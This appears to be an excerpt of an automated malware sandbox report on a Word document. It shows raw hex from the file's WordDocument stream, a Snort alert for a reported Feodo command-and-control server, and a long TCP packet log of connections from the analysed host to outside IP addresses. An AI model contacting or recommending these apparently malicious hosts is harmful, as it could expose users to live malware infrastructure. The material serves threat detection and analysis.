                      Data Raw:01 91 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 16 c1 ed 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                      Stream Path: WordDocument, File Type: data, Stream Size: 20014
                      General
                      Stream Path:WordDocument
                      File Type:data
                      Stream Size:20014
                      Entropy:4.1368278567
                      Base64 Encoded:False
                      Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . H . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . N . . b . . . b . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8f 48 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 4e 00 00 62 7f 00 00 62 7f 00 00 8f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      01/12/21-20:31:20.789009TCP2404340ET CNC Feodo Tracker Reported CnC Server TCP group 214916880192.168.2.2271.72.196.159

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jan 12, 2021 20:31:04.502388954 CET49165443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.613992929 CET443491655.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.614180088 CET49165443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.629313946 CET49165443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.740904093 CET443491655.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.740953922 CET443491655.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.740977049 CET443491655.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.741005898 CET443491655.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.741178036 CET49165443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.741214037 CET49165443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.754389048 CET49165443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.755346060 CET49166443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.865854979 CET443491655.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.866605043 CET443491665.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.866749048 CET49166443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.867340088 CET49166443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.978590965 CET443491665.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.978642941 CET443491665.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.978676081 CET443491665.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.978705883 CET443491665.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:04.978878021 CET49166443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:04.980880976 CET49166443192.168.2.225.2.81.171
                      Jan 12, 2021 20:31:05.067197084 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.092096090 CET443491665.2.81.171192.168.2.22
                      Jan 12, 2021 20:31:05.139599085 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.139782906 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.140002012 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.212311983 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219491005 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219544888 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219584942 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219623089 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219634056 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.219661951 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219698906 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219708920 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.219739914 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219772100 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.219779015 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219829082 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219846010 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.219876051 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.219939947 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292373896 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292434931 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292473078 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292522907 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292534113 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292566061 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292607069 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292612076 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292649031 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292681932 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292687893 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292726040 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292762995 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292767048 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292807102 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292835951 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292855978 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292905092 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292927980 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.292943954 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.292983055 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.293020010 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.293021917 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.293061018 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.293096066 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.293101072 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.293140888 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.293171883 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.293190002 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.293261051 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.365664005 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365725040 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365765095 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365806103 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365842104 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.365865946 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365890980 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.365915060 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365953922 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.365983009 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.365993023 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366033077 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366055965 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366070986 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366110086 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366134882 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366153955 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366203070 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366208076 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366245031 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366283894 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366307974 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366324902 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366364956 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366388083 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366400957 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366441965 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366463900 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366481066 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366529942 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366542101 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366575003 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366611958 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366637945 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366651058 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366689920 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366717100 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366725922 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366765022 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366786003 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366806030 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366864920 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366867065 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366915941 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366954088 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.366978884 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.366993904 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.367033958 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.367058992 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.367070913 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.367110014 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.367131948 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.367149115 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.367197037 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.367212057 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.367239952 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.367279053 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.367300034 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.367319107 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.367379904 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.368577003 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.439724922 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.439786911 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.439829111 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.439870119 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.439908981 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.439946890 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.439994097 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440037012 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440054893 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.440077066 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440087080 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.440118074 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440118074 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.440156937 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440191031 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.440196037 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440236092 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440274954 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440274000 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.440324068 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440342903 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.440366983 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440403938 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440433025 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.440443039 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440507889 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.440888882 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440933943 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.440973997 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441006899 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.441014051 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441056013 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441080093 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.441096067 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441144943 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441164017 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.441190004 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441234112 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441265106 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.441272974 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441314936 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441334963 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.441354990 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441420078 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.441426039 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441468000 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441505909 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441530943 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.441554070 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441597939 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441617012 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.441637993 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441677094 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441699028 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.441715956 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441754103 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441777945 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.441796064 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441836119 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441859961 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.441886902 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441930056 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.441953897 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.441970110 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.442008972 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.442034006 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.442047119 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.442085028 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.442112923 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.442123890 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.442183971 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.443010092 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.512900114 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.512981892 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513012886 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513044119 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513082981 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513132095 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513175011 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513214111 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513246059 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513286114 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513330936 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.513334036 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513360023 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.513380051 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513421059 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.513459921 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513499022 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513539076 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513565063 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.513576984 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513613939 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513622046 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.513654947 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.513685942 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.515120029 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515161037 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515202045 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515206099 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.515240908 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515279055 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515280008 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.515320063 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515342951 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.515360117 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515409946 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515429020 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.515454054 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515491962 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515517950 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.515532970 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515573978 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515603065 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.515610933 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515650034 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515681982 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.515688896 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515737057 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515758038 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.515779972 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515819073 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515850067 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.515858889 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515901089 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515932083 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.515938997 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.515980005 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.516005993 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.516017914 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.516066074 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.516083002 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.516110897 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.516149044 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.516185045 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.516189098 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.516230106 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.516258001 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.516268015 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.516307116 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.516335011 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.516774893 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.586136103 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586209059 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586251974 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586301088 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586345911 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586385965 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586426020 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586464882 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586503983 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586508989 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.586538076 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.586544991 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586545944 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.586580992 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.586585999 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586636066 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586662054 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.586680889 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586719036 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586750984 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.586759090 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586801052 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586827040 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.586838007 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586896896 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586905956 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.586937904 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.586987972 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587027073 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.587033033 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587075949 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587097883 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.587116003 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587157011 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587188959 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.587196112 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587238073 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587263107 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.587279081 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587331057 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587344885 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.587374926 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587414980 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587445974 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.587455034 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587496996 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587526083 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.587537050 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587578058 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587599993 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.587618113 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587667942 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587680101 CET4916780192.168.2.22109.232.216.177
                      Jan 12, 2021 20:31:05.587714911 CET8049167109.232.216.177192.168.2.22
                      Jan 12, 2021 20:31:05.587753057 CET8049167109.232.216.177192.168.2.22
